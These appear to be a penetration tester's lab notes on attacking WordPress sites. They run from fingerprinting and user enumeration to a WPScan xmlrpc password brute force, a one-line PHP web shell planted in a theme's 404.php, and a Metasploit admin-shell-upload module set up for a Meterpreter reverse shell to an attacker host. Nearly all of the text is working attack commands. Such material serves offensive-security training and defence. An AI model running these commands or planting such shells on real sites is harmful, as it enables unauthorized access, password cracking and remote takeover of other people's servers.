Wordpress Attacks

Discovery/Footprinting

Look into /robots.txt

User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
Disallow: /wp-content/uploads/wpforms/

Sitemap: https://inlanefreight.local/wp-sitemap.xml

presence of the /wp-admin and /wp-content directories

Enumeration

curl -s https://blog.inlanefreight.local | grep WordPress

<meta name="generator" content="WordPress 5.8" /

themes

curl -s https://wehost.co.in/ | grep themes

plugins

curl -s https://wehost.co.in/ | grep plugins

Enumerating Users

login page can be found at /wp-login.php.
A valid username and an invalid password results in the following message:
an invalid username returns that the user was not found.

WPScan

sudo wpscan --url http://blog.inlanefreight.local --enumerate --api-token dEOFB<SNIP>

sudo wpscan --url http://blog.inlanefreight.local --enumerate --api-token dEOFB<SNIP>

Attacking WordPress

The wp-login method will attempt to brute force the standard WordPress login page, while the xmlrpc method uses WordPress API to make login attempts through /xmlrpc.php.
- The xmlrpc method is preferred as it’s faster.

sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.local

Code Execution

system($_GET[0]);

curl http://blog.inlanefreight.local/wp-content/themes/twentynineteen/404.php?0=id

PHP Meterpreter shell

use exploit/unix/webapp/wp_admin_shell_upload

set rhosts blog.inlanefreight.local
set username john
set password firebird1
set lhost 10.10.14.15
set rhost 10.129.42.195
set VHOST blog.inlanefreight.local

 show options

exploit

PreviousExtracting windows wifi password NextJoomla Attacks

Last updated 1 year ago

Discovery/Footprinting

Enumeration

Enumerating Users

WPScan

Attacking WordPress

Login Bruteforce

Code Execution

PHP Meterpreter shell